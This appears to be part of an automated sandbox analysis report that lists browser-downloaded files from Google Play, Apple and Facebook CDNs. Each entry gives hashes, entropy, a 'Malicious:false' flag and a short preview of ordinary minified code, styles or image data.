                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1881)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):42032
                                                                                                                                                                                                                                  Entropy (8bit):5.436259422203893
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:TBKiTA/pZGZJmpQbAFSSCN5VoEmp8oQDt+U9JU7vvc/sl0ov09MCDTVMrhvUVsbN:aTGZgCNDv+eUlsDTYhvYQ/gCqehTPUgV
                                                                                                                                                                                                                                  MD5:6A62C13FDFCB467B2953F9CCEDCCF523
                                                                                                                                                                                                                                  SHA1:D5CCD0646CEB76A56954BE1016FD1EB65E17D10F
                                                                                                                                                                                                                                  SHA-256:6AF490BACF55B2D6858CA35B3F40E659E49E320D715BE00E669ED6371F6FC00A
                                                                                                                                                                                                                                  SHA-512:610FB3519E13CDC8DE5EDEA21604BD112CE6E962566514174DA046D6FA12705292D1F2C91539EF177F66FC1CE9C9FCAB1AE0989852775994C037CBA27BB24628
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=_b,_tp/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=byfTOb,lsjVmc,LEikZe"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.Hqa=function(a){let b=0;for(const c in a)b++;return b};_.Iqa=function(a,b){for(const c in a)if(a[c]==b)return!0;return!1};_.Jqa=function(a){return a.Kh&&typeof a.Kh=="function"?a.Kh():_.da(a)||typeof a==="string"?a.length:_.Hqa(a)};._.Sn=function(a){if(a.Ci&&typeof a.Ci=="function")return a.Ci();if(typeof Map!=="undefined"&&a instanceof Map||typeof Set!=="undefined"&&a instanceof Set)return Array.from(a.values());if(typeof a==="string")return a.split("");if(_.da(a)){for(var b=[],c=a.length,d=0;d<c;d++)b.push(a[d]);return b}return _.Va(a)};._.Kqa=function(a){if(a.tn&&typeof a.tn=="function")return a.tn();if(!a.Ci||typeof a.Ci!="function"){if(typeof Map!=="undefined"&&a instanceof Map)return Array.from(a.keys());if(!(typeof Set!=="undefined"&&a instanceof Set)){if(_.da(a)||typeof a==="string"){var b=[];a=a.length;for(var c=0;c<a;c++)b.push(c);return b}return _.Wa(a)}}};.var Lqa,Mqa,Nqa
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):21057
                                                                                                                                                                                                                                  Entropy (8bit):4.806084471510432
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:E38lrSKuiR7n74LAUo5NtBmUhBeIyY0xHUjU3:q8lrSKuiB74LAUo5NtBmUhBeIyY0xHU0
                                                                                                                                                                                                                                  MD5:E58F2133D9AE2B6F5C8E1CBF56319085
                                                                                                                                                                                                                                  SHA1:0FC4141498E8486FDAA29F4D57FE89E9A4EC56F9
                                                                                                                                                                                                                                  SHA-256:DBA40B09DD034C3C9483680AF24BDDDEC7B910E3CBB6F908BCBF8552F8C7819D
                                                                                                                                                                                                                                  SHA-512:F738972BBC413C68FA88693B9DD885BEDE49278A37DF1D224E058FE50BE0CC20F9E129D871D40E5E2F5BFF266111E8873D305A3B559B2A9A22EAB06C57A47826
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.apple.com/api-www/global-elements/global-header/v1/flyouts?locale=en_UZ
                                                                                                                                                                                                                                  Preview:[{"id":"3d39a8ff","name":"apple","analyticsAttributes":[{"name":"data-analytics-title","value":"apple home"}]},{"id":"a5e87de9","name":"mac","baseGroups":[{"id":"5bdb085b","title":"More from Mac","analyticsAttributes":[{"name":"data-analytics-region","value":"more from mac"}],"baseLinks":[{"analyticsAttributes":[{"name":"data-analytics-exit-link","value":"true"},{"name":"data-analytics-title","value":"mac support"}],"text":"Mac Support","url":"https://support.apple.com/en-uz/mac?cid=gn-ols-mac-psp-prodfly","ariaLabel":"","id":"c07886de"},{"analyticsAttributes":[{"name":"data-analytics-title","value":"continuity"}],"text":"Continuity","url":"/uz/macos/continuity/","ariaLabel":"","id":"b204e51d"},{"analyticsAttributes":[{"name":"data-analytics-title","value":"icloud+"}],"text":"iCloud+","url":"/uz/icloud/","ariaLabel":"","id":"51c89dd2"},{"analyticsAttributes":[{"name":"data-analytics-title","value":"mac for business"}],"text":"Mac for Business","url":"/uz/business/mac/","ariaLabel":"","
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12513)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13517
                                                                                                                                                                                                                                  Entropy (8bit):5.314863543101727
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8nlFipHnQ5/BRZJ/bzwT62waHKsR5ssRaREW+ou:8lF2HQ5JRjbQw9sRasROEWY
                                                                                                                                                                                                                                  MD5:24F387A60FE0B05A15426D721C397D47
                                                                                                                                                                                                                                  SHA1:012EB578C3C097193F20F123732AC646D2800096
                                                                                                                                                                                                                                  SHA-256:6AD8C8A703856136FEA1D1911FE8C0E09BCE87EDE20F4C8B98AB8F8961462738
                                                                                                                                                                                                                                  SHA-512:787E1A2BCCBCD973135E53B53FA5BC89E59AC277D95F30B0595B225667B1F0DEB6616914915200ABB6E522DDEA144E2EEF140876CA502D1317E13E86E63DA9A1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const e="musickit-components";let t,n,l,s=!1,o=!1,i=!1,r=!1,c=null,f=!1;const a="undefined"!=typeof window?window:{},u=a.document||{head:{}},d={t:0,l:"",jmp:e=>e(),raf:e=>requestAnimationFrame(e),ael:(e,t,n,l)=>e.addEventListener(t,n,l),rel:(e,t,n,l)=>e.removeEventListener(t,n,l),ce:(e,t)=>new CustomEvent(e,t)},p=e=>Promise.resolve(e),$=(()=>{try{return new CSSStyleSheet,"function"==typeof(new CSSStyleSheet).replaceSync}catch(e){}return!1})(),m=(e,t,n)
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 34108, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):34108
                                                                                                                                                                                                                                  Entropy (8bit):7.993096562158293
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:xDa3S2Rdcc3/k1/3Sr8dgfqHwQGMIto3/fIpos4GbtJzxn:xu3SQ3e/3S43TUtoP4Ftn
                                                                                                                                                                                                                                  MD5:C15D33A9508923BE839D315A999AB9C7
                                                                                                                                                                                                                                  SHA1:D17F6E786A1464E13D4EC8E842F4EB121B103842
                                                                                                                                                                                                                                  SHA-256:65C99D3B9F1A1B905046E30D00A97F2D4D605E565C32917E7A89A35926E04B98
                                                                                                                                                                                                                                  SHA-512:959490E7AE26D4821170482D302E8772DD641FFBBE08CFEE47F3AA2D7B1126DCCD6DEC5F1448CA71A4A8602981966EF8790AE0077429857367A33718B5097D06
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/googlesans/v58/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                                                                                                                                                                                                  Preview:wOF2.......<..........................................\..4?HVAR.t.`?STAT..'...J/<.....`..(..Z.0..,.6.$.... ..B..K..[.h...c.....nC .../.V.v..6>nT.*R...b.8.@.......ON.ch.......k..."..".9..\D...JBJ."T%5...Z2..Q.)wJ...sA.h..m....n..F.....t..ig.=..y.s@............t..j.*....n.h(...........N..)9.....v`|z....8.7..kTq....^.......[.K.O..1ZP.....;.HP.......>..+..j:.V.......A......[.f.l..v`x....F_..vo...e....n...H..X.2.v}...(.1J...x.....}.....5.3.....?..?..7...S..0.9..C.0.M..M9..e.b....bc..b4.0"e.G.....XT....z............E'c.(."...x`].]..e.rQ..ye.z........kFh;....Y.yPt.._Q.._-q..mi.Og.W.-qUI*...m5..r.mvA~o....S.f........s..ql.aXD...H..wy.P..k...f$.V^.2...8U{...f.....]]..G..cf.......D.c&B'S.2~..N..........R;..).5...../... 6....b....]d6."C..T..........OI\+V'...E.[.g.u.E....,*!F.....*U.q. :x.s..1..C....H..S%..)....h......K..........pw.f...f.......an3....9....@......%.2.c.+........cXD..F...B.....0'...O.z8.B....4...\..&c...H....;..p....@.l...:........L..`...5..xo&.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):110752
                                                                                                                                                                                                                                  Entropy (8bit):5.4453482459935545
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:FxQl5so8Bthsn4mVdTHO6HcXz9MXYfxD0uDogzOnUsB4w7+Wf:Fx88BwpQCXOx7Wf
                                                                                                                                                                                                                                  MD5:68FC27BF81FA90D31F7143F89C3D3A27
                                                                                                                                                                                                                                  SHA1:7E1177E3705594AA852550D574CE0FB83BFD7D73
                                                                                                                                                                                                                                  SHA-256:4E54960D38B8C65EC473828F158070BC6FFFB049F281A0C13DEF7D99D3CD4205
                                                                                                                                                                                                                                  SHA-512:23B8C64FB950548574F2886D33D84D29C3BA703CECD70A68358A4E4E53A401453FC66E0B26112E725FA76A8E8AFB1AD5967A580B077B03EECE695CA2A305DB1D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/ziNkdVTlV4m.css"
                                                                                                                                                                                                                                  Preview:._ai7j{overflow:visible;position:relative}._ai7k._ai7m ._ai7o{margin-left:8px}@keyframes BUIButtonBusyIndicatorFadeIn{0%{opacity:0}100%{opacity:1}}._ai7l._ai7m ._ai7o{animation:BUIButtonBusyIndicatorFadeIn 1 200ms cubic-bezier(.08,.52,.52,1);display:flex;left:50%;pointer-events:none;position:absolute;top:50%;transform:translate(-50%, -50%);z-index:1}._ai7l>*>*:not(._ai7o):not(._ai7p){transition:opacity 200ms cubic-bezier(.08,.52,.52,1)}._ai7l._ai7n>*>*:not(._ai7o):not(._ai7p){opacity:0}._ai7l{outline:none}._ai7p{bottom:-1px;box-shadow:0 0 0 2px currentColor;left:-1px;position:absolute;right:-1px;top:-1px}.@font-face{font-family:'Roboto';font-style:normal;font-weight:400;src:local('Roboto'), local('Roboto-Regular'), url(/rsrc.php/yH/r/c_1vdG88uNh.woff2) format('woff2'), url(/rsrc.php/yN/r/KKlOyJQcRfr.woff) format('woff')}@font-face{font-family:'Roboto';font-style:italic;font-weight:400;src:local('Roboto Italic'), local('Roboto-Italic'), url(/rsrc.php/yh/r/pXADmoqqN0T.woff2) format('woff
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10666
                                                                                                                                                                                                                                  Entropy (8bit):7.978774786509374
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:/UHhnCtDtC1zgBFiQhfUA6v5vHo6VJvU4OIDkIqVJb1R:/UHhCPociQhfUnv5vLVJzOIR41R
                                                                                                                                                                                                                                  MD5:47833F10AEBEC984180E3FD36F9D2FF3
                                                                                                                                                                                                                                  SHA1:A78C80897BD272BFF32A54F3D9119A1C52A80B75
                                                                                                                                                                                                                                  SHA-256:B3607479E9258DA8AA8C8943BD8B7D2F27863E1FC656D2421846DA58390523B5
                                                                                                                                                                                                                                  SHA-512:2767362EE4809CDC2B288536D36791EE01E5E7C4CAD9C529F4AAC2883644B4806FD02BF17494E81F651434D4477402F6CE34DB37B29CBAFC793E61DAC19E6DEB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/GOsdMmikeSBOblYF_chfJHF_4N2xhGhZ3AtVC70mzi_BdM6cJs_T0SbyRSHJZX6xt0In=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF.)..WEBPVP8L.)../?.....m.6P.+............3A....|6<....! k.0.$%...+...GF....$5...|.......b.I..~.|.;...rT..S.A.CU...V...f..)..|...V?.V.._H...a..V~./......1^.....U.".*G..m.._Z.G....z..i......w.....]SF..Q..<^.......X.wd$...4i..iK.pX..........s..^x...N.B...I...?...z.._q.......K2.......R.]...........uww.Z.ug.T..[..J..!$.Of.x.mmy.l...E..[.0.O..wq........affff.2..etm.n.c9.mI.K...qD|p.....q6...1$...X...C .......@....,P....t......:....Q..1..G........1..`.. .....H.....5.iA...?.._.8(..9...LkJ.........+...11AP.$....t@..61..}..@...Y.......@.$,...m..v`e.n.q...M..:/<*........3..@@J.A..c...7...@.X...{qf...4.`..mKh|hJ.....3.#gv_...:0....*T.S..PT......h...........+D#._</....>]u-];!"..d.N..\....5...[.'Q.H.g%}.r|(.Wn;./4..z.}.F......sSf....4)....*....l...-._.n...`..._@./h...il...L.H0..M.Ru.d.*z?.B...+Q..{..3@.M.Y...zr..........q9S7...A....}...2.....4.<.h.O.a...X....I......$.,.`...rq...D0.+?.{........M,R.4EL.O[.....4...G..NW..o..CY...\.f.R.K~.vu...,...q..+j
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (54502), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):54685
                                                                                                                                                                                                                                  Entropy (8bit):4.949096357757183
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:OS7p4X4HeZvR3b8uuXTxXhfdjiXcOEvezvee/5NVwA1NAGBAf5TTCE6/iSphWhOb:OS7p4X4HeZvR3b8uuXTxXhfdjiXcOEvM
                                                                                                                                                                                                                                  MD5:89780A9D2EEDFF61551113850A3547EF
                                                                                                                                                                                                                                  SHA1:6365051BAD2052F07E30706797A161704731F33B
                                                                                                                                                                                                                                  SHA-256:590B2F2F1C0CAFB359841C32F78516FD3352C9DE82B0E2F1A0132BE6DCF035E6
                                                                                                                                                                                                                                  SHA-512:10B39022616F57E3FD8371FCC0D2ACE5F55552FD6938719BAE712E48710564A4D7025BA9AEF362F5366D4D2CCF069C1CF45B06F34A2FFA4D9F996D94C8230FA1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/global-elements/2426.0.0/en_UZ/ac-global-footer.89780a9d2eedff61551113850a3547ef.css
                                                                                                                                                                                                                                  Preview:@font-face{font-family:"Apple Legacy Chevron";font-style:normal;font-weight:100;src:local("\f8ff"),url("../assets/ac-footer/legacy/appleicons_ultralight.woff") format("woff"),url("../assets/ac-footer/legacy/appleicons_ultralight.ttf") format("truetype")}@font-face{font-family:"Apple Icons 100";src:url("../assets/ac-footer/legacy/appleicons_ultralight.eot")}@font-face{font-family:"Apple Legacy Chevron";font-style:normal;font-weight:200;src:local("\f8ff"),url("../assets/ac-footer/legacy/appleicons_thin.woff") format("woff"),url("../assets/ac-footer/legacy/appleicons_thin.ttf") format("truetype")}@font-face{font-family:"Apple Icons 200";src:url("../assets/ac-footer/legacy/appleicons_thin.eot")}@font-face{font-family:"Apple Legacy Chevron";font-style:normal;font-weight:300;src:local("\f8ff"),url("../assets/ac-footer/legacy/appleicons_thin.woff") format("woff"),url("../assets/ac-footer/legacy/appleicons_thin.ttf") format("truetype")}@font-face{font-family:"Apple Icons 300";src:url("../asset
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16042)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):182311
                                                                                                                                                                                                                                  Entropy (8bit):5.451905341264212
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:nxgSNPtIa33ZDcnkoSyOjb4SVPkFKsoP90Cls+j5ppjKa:q0kRG
                                                                                                                                                                                                                                  MD5:84D2537133FE5ECA4A2637D15B9825DC
                                                                                                                                                                                                                                  SHA1:B5D7E28F8E7278EC8ED139B4BBACEB233268E7B3
                                                                                                                                                                                                                                  SHA-256:02B230AE382133BF1CC981246A730C3B33E81DFCD17E9A1AA4991939631981FD
                                                                                                                                                                                                                                  SHA-512:06E11485B2CE0C08FF1526B713997BE6BAA8763E0E169EB3B52CF6F782F96E92A9AD6E89908EDD1F099C40CDF2F5D720DAFDD31010E6BE7CD3A81F3E62289CA0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3ievD4/yP/l/en_GB/-F9g11XP17c.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("compareDOMOrder",[],(function(a,b,c,d,e,f){"use strict";function a(a,b){return a.compareDocumentPosition(b)&Node.DOCUMENT_POSITION_FOLLOWING?-1:1}f["default"]=a}),66);.__d("createLayoutContext",["compareDOMOrder","emptyFunction","react","useRefEffect","useUnsafeRef_DEPRECATED"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||(i=d("react"));b=i;var k=b.useContext,l=b.useImperativeHandle,m=b.useMemo,n=b.useReducer;function a(a){var b={getLayout:function(){return a},dispatch:c("emptyFunction"),nodes:new Map(),values:[]},d=j.createContext(b);function e(a){var b=a.children,c=a.imperativeRef,e=a.value;a=q();var f=a[0],g=a[1],h=a[2];l(c,function(){return{forceUpdate:function(){return h()}}},[h]);a=m(function(){return{getLayout:e,dispatch:h,nodes:f,values:g}},[h,f,e,g]);return j.jsx(d.Provider,{value:a,children:b})}e.displayName=e.name+" [from "+f.id+"]";function g(a){return j.jsx(d.Provider,babelHelpers["extends"]({value:b},a))}g.displayName=g.name+" [from "+f.id+"]
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):35166
                                                                                                                                                                                                                                  Entropy (8bit):7.993906515460747
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:Lo7bx0ENM+qArqRFsjA6soKxUs5n6nYqfx0mz:M7bmENM0rqRunsXUs56nYsn
                                                                                                                                                                                                                                  MD5:DB14CF957F653B59549F1F97B9D9B244
                                                                                                                                                                                                                                  SHA1:BB5758B726DE6E35271B602BE05EBF24371B3FF2
                                                                                                                                                                                                                                  SHA-256:65DF5609FE2302C70875786C6F04383FB3C0FFF09FFDB69AFD884A41733B31C6
                                                                                                                                                                                                                                  SHA-512:52A76D25551D1DD36361629E21023265844BD612C487F09C4A9D8CEE9E087C87F970FF93E7E05946D3A821D4F402A843E080FA9E48DEF6066E8C77ECBF234948
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/DEbRrpMmIVFTXH_FH2MezPtEBXhYs2UdwMRK7Q8Mkqdg0tfCikZRnvtZscfYkdbwTvY=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFFV...WEBPVP8 J...pl...*..(.>q,.F$...1..@...lk.W.>/C.........x.A.....).7.?...?.w......./...=.......w._........~........].s....Q.._......s=........w......3.O.o.....O...~.?...?..X....g...........O..i...3.w..y.y..w.........s.....|c.S...G.?.?..m{.....|....._.O`.k~..;.g.._....E.o...?....@......../.^......w.....?.....g>........w.O...?......u.............?.................z.....$.k....|.X_}VQ..yzw..nz........1.....F..Q.....i.y.H...(......U2.@9.8f..-./..08.......IT.....e.....I..L.H.-..._......i.y.{..+w\..V..M.b..I.M....Z.......l.x-...R.8..s2.....L..x....2A.N...........J[j.".YpB^..'....-A....w./<.r..R.[..,...5....`j..8..O".M.1Jn..,*&=....#.W>9....w..s..3.W..`33.#..).e..cX.t.w8...FGW......?.S.C.L..W....W.'..L.!.N.<e.!..J.f.l6$E..JW}.z.E*...-.t......k0......e&....B..X.......... Ssi..U.a...c.....5/..../..<M..:.?..W...I...b...H..l.N...(.^.J.-..................K.3......t.......B.;..gD..X...V..T...YOu.[.....~..7...mv....eS....v.C@Z.ql...a..4.....`o...f.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6735)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):28815
                                                                                                                                                                                                                                  Entropy (8bit):5.582969537394197
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:RDfALR2Eq9iqM9iO8YMri4HJQ6deqtl4E7gqzIoTvvaiQYKhc3wSW0Dm6/mXXKO3:RDcCJQ6dBfYregv0D/+KOx1
                                                                                                                                                                                                                                  MD5:B9B91A44A89E975AD8A814EA863AF491
                                                                                                                                                                                                                                  SHA1:F56DC8A28B471EA8F0153333DD13634FB3C382F5
                                                                                                                                                                                                                                  SHA-256:B734E9ACF9AB9F17CB40B8916CB03C7544FC7915951E9D9724024AD69AAA27ED
                                                                                                                                                                                                                                  SHA-512:46943E2F2EE1A6F9823C52976BEDF2E4401161AA41ACF377A2B13A0818F003CCF6C54F7946C6051A7912A767C195DEF516F071B43685A1AC3F755A0B64B67394
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/BCReGA2whNu.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("BanzaiAdapter",["cr:5866"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:5866")}),98);.__d("BanzaiConsts",[],(function(a,b,c,d,e,f){a={SEND:"Banzai:SEND",OK:"Banzai:OK",ERROR:"Banzai:ERROR",SHUTDOWN:"Banzai:SHUTDOWN",BASIC:"basic",VITAL:"vital",BASIC_WAIT:6e4,BASIC_WAIT_COMET:2e3,VITAL_WAIT:1e3,BATCH_SIZE_LIMIT:64e3,EXPIRY:864e5,BATCH_TIMEOUT:1e4,LAST_STORAGE_FLUSH:"banzai:last_storage_flush",STORAGE_FLUSH_INTERVAL:12*60*6e4,POST_READY:0,POST_INFLIGHT:1,POST_SENT:2};b=a;f["default"]=b}),66);.__d("BanzaiUtils",["BanzaiConsts","FBLogger","cr:1172","cr:9985","cr:9986"],(function(a,b,c,d,e,f){"use strict";var g,h={canSend:function(a){return a[2]>=b("cr:9985")()-(g||(g=b("BanzaiConsts"))).EXPIRY},filterPost:function(a,c,d,e){if(e.overlimit)return!0;if(!e.sendMinimumOnePost&&a[4]+e.currentSize>(g||(g=b("BanzaiConsts"))).BATCH_SIZE_LIMIT)return!0;var f=a.__meta;if(f.status!=null&&f.status>=(g||(g=b("BanzaiConsts"))).POST_SENT||!h.canSend(a))return!1;if(f.status!=null&&f.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3260)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10762
                                                                                                                                                                                                                                  Entropy (8bit):5.379732879924647
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:w5/cOvikJSBxiFoFBgUpLJOH/+p/q0BK62dpYxqxO41GHtH8o1GiKSW8fpIHZ:A/cUxR3UBJOh9tOnNHHFROZ
                                                                                                                                                                                                                                  MD5:6B937B2E35342EA3AA6B42163A1D0E80
                                                                                                                                                                                                                                  SHA1:EC2DFA3F6FE73EEA1856EC8110F7CFA31BBE5BB4
                                                                                                                                                                                                                                  SHA-256:413A46CE279B3DFCBFF61C1AF7BE32656675E47336B6301701F701902EBF53B8
                                                                                                                                                                                                                                  SHA-512:B458B6CFB298EE079FDDBE9011E6A422BB79EE0DEB545422D9EBFA3D752FBDB0C355874D710B6F4DC73EE78776C166107760C189854ED7CAE2605529E5C113D9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/fCWCnWQldVh.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("Button",["csx","cx","invariant","CSS","DOM","DataStore","Event","Parent","emptyFunction","isNode"],(function(a,b,c,d,e,f,g,h,i,j){var k="uiButtonDisabled",l="uiButtonDepressed",m="_42fr",n="_42fs",o="button:blocker",p="href",q="ajaxify";function r(a,b){var e=d("DataStore").get(a,o);b?e&&(e.remove(),d("DataStore").remove(a,o)):e||d("DataStore").set(a,o,c("Event").listen(a,"click",c("emptyFunction").thatReturnsFalse,c("Event").Priority.URGENT))}function s(a){a=d("Parent").byClass(a,"uiButton")||d("Parent").bySelector(a,"._42ft");if(!a)throw new Error("invalid use case");return a}function t(a){return c("DOM").isNodeOfType(a,"a")}function u(a){return c("DOM").isNodeOfType(a,"button")}function v(a){return d("CSS").matchesSelector(a,"._42ft")}var w={getInputElement:function(a){a=s(a);if(t(a))throw new Error("invalid use case");if(u(a)){a instanceof HTMLButtonElement||j(0,21261);return a}return c("DOM").find(a,"input")},isEnabled:function(a){return!(d("CSS").hasClass(s
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10953)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):151566
                                                                                                                                                                                                                                  Entropy (8bit):5.39929251490803
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:JKzpzSVqQwMTqHD+yOGJLlViLRbrnCefvgYeMhroycP:JezSsfLlieP
                                                                                                                                                                                                                                  MD5:BC987911D4BED722BE159E8E4A955EE4
                                                                                                                                                                                                                                  SHA1:0637F70A3D1C00CDCDA780B9ACC21EA998E75AC7
                                                                                                                                                                                                                                  SHA-256:C31B9CE3C5C30304DD4F59649186764B75FED6F28059104C605A4F8FDC5CC2B5
                                                                                                                                                                                                                                  SHA-512:F7440F9E947479402466655BE6C26B11E0A39CE331B958EAE9BB65051ABEAC56407AA40EE29AF9B54F4725DECD8E82FCD1CB627D94641307446A541279CFABEA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
